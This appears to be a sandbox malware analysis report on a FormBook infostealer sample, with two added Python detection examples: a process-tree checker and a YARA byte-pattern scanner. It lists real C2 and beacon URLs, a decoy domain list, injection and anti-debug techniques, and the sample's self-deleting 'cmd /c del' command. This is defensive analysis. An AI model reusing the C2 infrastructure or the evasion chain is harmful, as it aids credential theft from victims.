Analysis Report Y4U48592345670954.exe

Overview

General Information

Sample Name: Y4U48592345670954.exe
Analysis ID: 383918
MD5: e8e69391d3a931e6638adaebf6a339f6
SHA1: 29c02e786c6f8b343bc0f05a1195ff5215d21e63
SHA256: 20087dfd9482120735e4e37edc7307b91264632b0c9c7b50a058c100ba186ece
Tags: exe, Formbook
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Y4U48592345670954.exe (PID: 7016 cmdline: 'C:\Users\user\Desktop\Y4U48592345670954.exe' MD5: E8E69391D3A931E6638ADAEBF6A339F6)
    • Y4U48592345670954.exe (PID: 7080 cmdline: 'C:\Users\user\Desktop\Y4U48592345670954.exe' MD5: E8E69391D3A931E6638ADAEBF6A339F6)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 2628 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 5052 cmdline: /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
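The process tree above is the FormBook pattern worth writing detection for: the sample injects into explorer.exe, explorer.exe starts a 32-bit NETSTAT.EXE (which receives the injected payload), and NETSTAT.EXE runs cmd.exe to delete the original sample. What follows is an added example, not part of the Joe Sandbox report, that evaluates process-creation events for two signals of that chain: a cmd.exe `/c del` whose target is the image of another process seen in the window (self-deletion) or whose parent is not a shell, and explorer.exe starting netstat directly. The event schema (pid, ppid, image, cmdline) is an assumed generic one, the events are constructed from the tree on this page, and the cmd.exe image path is assumed because the report shows only its command line.

```python
import re
from dataclasses import dataclass
from typing import List


@dataclass
class ProcEvent:
    """Minimal process-creation event; the field names are an assumed generic
    schema, not any particular EDR's."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the Startup tree in this report (PIDs and paths as listed
# there; the cmd.exe image path is assumed). The sandbox draws explorer.exe
# beneath the sample because the sample injects into it; in real telemetry
# explorer.exe keeps its normal parent, so nothing below relies on that edge.
SAMPLE = r"C:\Users\user\Desktop\Y4U48592345670954.exe"
EVENTS = [
    ProcEvent(7016, 1, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(7080, 7016, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(3424, 7080, r"C:\Windows\explorer.exe", ""),
    ProcEvent(2628, 3424, r"C:\Windows\SysWOW64\NETSTAT.EXE",
              r"C:\Windows\SysWOW64\NETSTAT.EXE"),
    ProcEvent(5052, 2628, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{SAMPLE}'"),
    ProcEvent(5692, 5052, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

SHELL_PARENTS = {"cmd.exe", "powershell.exe", "explorer.exe"}
# "del <path>" with optional single or double quotes around the path
DEL_RE = re.compile(r"\bdel\b\s+['\"]?([^'\"]+?)['\"]?\s*$", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def find_self_delete(events: List[ProcEvent]) -> List[dict]:
    """Flag cmd.exe '/c del <file>' where <file> is the image of a process seen
    in the same window, or where cmd.exe was launched by something that is not
    a shell. Matching is by image path rather than ancestry because after
    injection the real chain explorer.exe -> NETSTAT.EXE -> cmd.exe never
    leads back to the sample."""
    by_pid = {e.pid: e for e in events}
    owners = {}
    for e in events:
        owners.setdefault(e.image.lower(), []).append(e.pid)
    hits = []
    for e in events:
        if basename(e.image) != "cmd.exe":
            continue
        m = DEL_RE.search(e.cmdline)
        if not m:
            continue
        target = m.group(1).strip()
        parent = by_pid.get(e.ppid)
        parent_name = basename(parent.image) if parent else None
        target_pids = owners.get(target.lower(), [])
        if target_pids or (parent_name and parent_name not in SHELL_PARENTS):
            hits.append({"cmd_pid": e.pid, "target": target,
                         "target_pids": target_pids, "parent": parent_name})
    return hits


def find_explorer_netstat(events: List[ProcEvent]) -> List[int]:
    """explorer.exe starting NETSTAT.EXE directly is the edge the report's
    'Uses netstat' signature records; a user would normally run it from a
    console, so the parent would be cmd.exe or powershell.exe."""
    by_pid = {e.pid: e for e in events}
    return [e.pid for e in events
            if basename(e.image) == "netstat.exe"
            and e.ppid in by_pid
            and basename(by_pid[e.ppid].image) == "explorer.exe"]


if __name__ == "__main__":
    for hit in find_self_delete(EVENTS):
        print("self-delete:", hit)
    print("explorer -> netstat:", find_explorer_netstat(EVENTS))
```

Both checks are cheap to run over Sysmon event ID 1 or equivalent EDR data; the self-delete check is the more general of the two, since the intermediate process FormBook picks varies between runs while the `cmd.exe /c del <sample>` step does not.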

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.middlehambooks.com/klf/"], "decoy": ["podcastyourvote.com", "northernlsx.com", "guide4idiots.com", "artebythesea.com", "sapanyc.com", "livinoutthedreamsco.com", "thepowersinyou.com", "protocolmodern.com", "holdergear.com", "betteringthehumanexperience.xyz", "agnostec.com", "royermaldonado.com", "wealthtruckingco.com", "artcode-software.com", "microsoftpods.com", "identityofplace.com", "algoritas.com", "grandpaurbanfarm.net", "zahidibr.com", "flawlessdrinking.com", "amymako.com", "tinymodeldiana.com", "restoremyorigin.com", "gyrostoyou.com", "boiler-portal.com", "aprilmarieclaire.com", "midollan.com", "finestfaux.com", "lownak.com", "okque.com", "woodandresin.club", "benficalovers.com", "fangyu5827.com", "tententacleshydro.com", "oouuweee.com", "sgsnit.com", "fairisnotfair.com", "shpwmy.com", "238olive.com", "4515a.com", "frontrangetechnologies.com", "v-travelclub.com", "supportserverhotline23.info", "snowandmotion.com", "colinboycemp.net", "yowoit.com", "neopivot.com", "singlebarrel.net", "esdras-almeida.com", "contecoliving.com", "doctorsdietgulfport.com", "issue72-paypal.com", "pubgfrut.com", "constipationhub.com", "themodernspiritualgoddess.com", "qzhongkong.com", "bizcert360.com", "nashvillegems.com", "barryteeling.com", "wzocflfor.com", "mirrorsmarbella.com", "nyariorganics.com", "packtmall.com", "100973671.review"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings (listed beneath each row)
00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(table truncated here; the full report lists 19 entries)

Unpacked PEs

Source | Rule | Description | Author | Strings (listed beneath each row)
2.1.Y4U48592345670954.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.1.Y4U48592345670954.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.1.Y4U48592345670954.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
2.2.Y4U48592345670954.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.2.Y4U48592345670954.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(table truncated here; the full report lists 13 entries)
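Two things in the Yara tables above are worth checking rather than reading past. First, every hit in the memory dump at 0xD50000 sits exactly 0xE00 bytes above the same hit in the 2.1 unpacked PE, for all ten `$sequence_*` strings and all six sqlite3 constants, which is what you expect when both artifacts are the same payload viewed at different bases (0xE00 is the gap between a first section at file offset 0x200 and its virtual address 0x1000; that reading is an inference, the report does not say so). Second, `$sequence_0` (`03 C8 0F 31 2B C1 89 45 FC`) decodes to `add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax`, the timing loop behind the "RDTSC time measurements" signature. The following is an added example, not part of the report or of either Yara rule's distribution: a dependency-free scanner for the rule's byte patterns, for triage on a box without libyara, plus the offset-correlation check. The offsets are copied from the tables above; the scanned buffer is constructed.

```python
from typing import Dict, List

# Hex strings exactly as the report's Yara tables print them.
PATTERNS = {
    "sequence_0": "03 C8 0F 31 2B C1 89 45 FC",  # add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax
    "sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "sequence_3": "3C 69 75 44 8B 7D 18 8B 0F",
    "sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "sequence_5": "0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06",
    "sequence_6": "57 89 45 FC 89 45 F4 89 45 F8",
    "sequence_7": "66 89 0C 02 5B 8B E5 5D",
    "sequence_8": "3C 54 74 04 3C 74 75 F4",
    "sequence_9": "56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00",
    "sqlite3step": "68 34 1C 7B E1",  # 68 imm32 = push imm32
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}

# Hit offsets copied from the report's tables.
DUMP_HITS = {  # 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp
    "sequence_0": [0x98e8, 0x9b62], "sequence_1": [0x15685], "sequence_2": [0x15171],
    "sequence_3": [0x15787], "sequence_4": [0x158ff], "sequence_5": [0xa57a],
    "sequence_6": [0x143ec], "sequence_7": [0xb273], "sequence_8": [0x1b327],
    "sequence_9": [0x1c32a], "sqlite3step": [0x18409, 0x1851c],
    "sqlite3text": [0x18438, 0x1855d], "sqlite3blob": [0x1844b, 0x18573],
}
UNPACK_HITS = {  # 2.1.Y4U48592345670954.exe.400000.0.unpack
    "sequence_0": [0x8ae8, 0x8d62], "sequence_1": [0x14885], "sequence_2": [0x14371],
    "sequence_3": [0x14987], "sequence_4": [0x14aff], "sequence_5": [0x977a],
    "sequence_6": [0x135ec], "sequence_7": [0xa473], "sequence_8": [0x1a527],
    "sequence_9": [0x1b52a], "sqlite3step": [0x17609, 0x1771c],
    "sqlite3text": [0x17638, 0x1775d], "sqlite3blob": [0x1764b, 0x17773],
}


def scan(buf: bytes, patterns: Dict[str, str]) -> Dict[str, List[int]]:
    """Return every offset of every pattern, overlapping matches included."""
    hits = {}
    for name, hexstr in patterns.items():
        pat = bytes.fromhex(hexstr)
        offs, i = [], buf.find(pat)
        while i != -1:
            offs.append(i)
            i = buf.find(pat, i + 1)
        hits[name] = offs
    return hits


def constant_shift(hits_a: Dict[str, List[int]], hits_b: Dict[str, List[int]]):
    """If every hit in hits_a pairs with one in hits_b at one and the same
    delta, return that delta; otherwise None. A single delta means the two
    artifacts carry the same payload bytes at different bases."""
    deltas = set()
    for name, offs in hits_a.items():
        other = hits_b.get(name)
        if other is None or len(other) != len(offs):
            return None
        deltas.update(a - b for a, b in zip(sorted(offs), sorted(other)))
    return deltas.pop() if len(deltas) == 1 else None


def build_sample() -> bytes:
    """Constructed buffer (not a real dump): zero-filled, with a few of the
    rule's patterns planted at known offsets."""
    buf = bytearray(0x400)
    for name, off in (("sequence_0", 0x100), ("sequence_0", 0x200),
                      ("sequence_4", 0x300), ("sqlite3step", 0x380)):
        pat = bytes.fromhex(PATTERNS[name])
        buf[off:off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    found = scan(build_sample(), PATTERNS)
    print({k: [hex(o) for o in v] for k, v in found.items() if v})
    print("dump vs unpack shift:", hex(constant_shift(DUMP_HITS, UNPACK_HITS)))
```

To use it on a real artifact, replace `build_sample()` with the bytes of the dump or unpacked PE; `constant_shift` is the quick way to confirm that two regions flagged by the same rule are one payload and not two.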

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w | Avira URL Cloud: Label: malware
Source: http://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D | Avira URL Cloud: Label: malware
Source: http://www.tententacleshydro.com/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: Y4U48592345670954.exe | Virustotal: Detection: 17%
Source: Y4U48592345670954.exe | ReversingLabs: Detection: 16%
Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE
Source: 2.1.Y4U48592345670954.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.NETSTAT.EXE.32fe660.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 2.2.Y4U48592345670954.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.NETSTAT.EXE.3d6f834.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Y4U48592345670954.exe.2850000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Y4U48592345670954.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: netstat.pdbGCTL | source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: netstat.pdb | source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
Source: Binary string: C:\xampp\htdocs\Cryptor\def056c534cc4ea39c4345526c5ff6fa\Loader\Loader\Release\p2wf97kzy.pdb | source: Y4U48592345670954.exe, 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp, yow0w7y8ovyw.dll.0.dr
Source: Binary string: wntdll.pdbUGP | source: Y4U48592345670954.exe, 00000000.00000003.652459500.000000001EF70000.00000004.00000001.sdmp, Y4U48592345670954.exe, 00000002.00000002.689550397.0000000000C6F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Y4U48592345670954.exe, NETSTAT.EXE
Source: Binary string: wscui.pdb | source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 0_2_004026BC FindFirstFileA,
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 4x nop then pop ebx

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.middlehambooks.com/klf/
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: global traffic | HTTP traffic detected: GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D HTTP/1.1 | Host: www.contecoliving.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1 | Host: www.identityofplace.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 HTTP/1.1 | Host: www.constipationhub.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1 | Host: www.tententacleshydro.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
Source: unknown | DNS traffic detected: queries for: www.contecoliving.com
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000002.915663862.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: NETSTAT.EXE, 00000004.00000002.915537693.000000000425F000.00000004.00000001.sdmp | String found in binary or memory: https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w
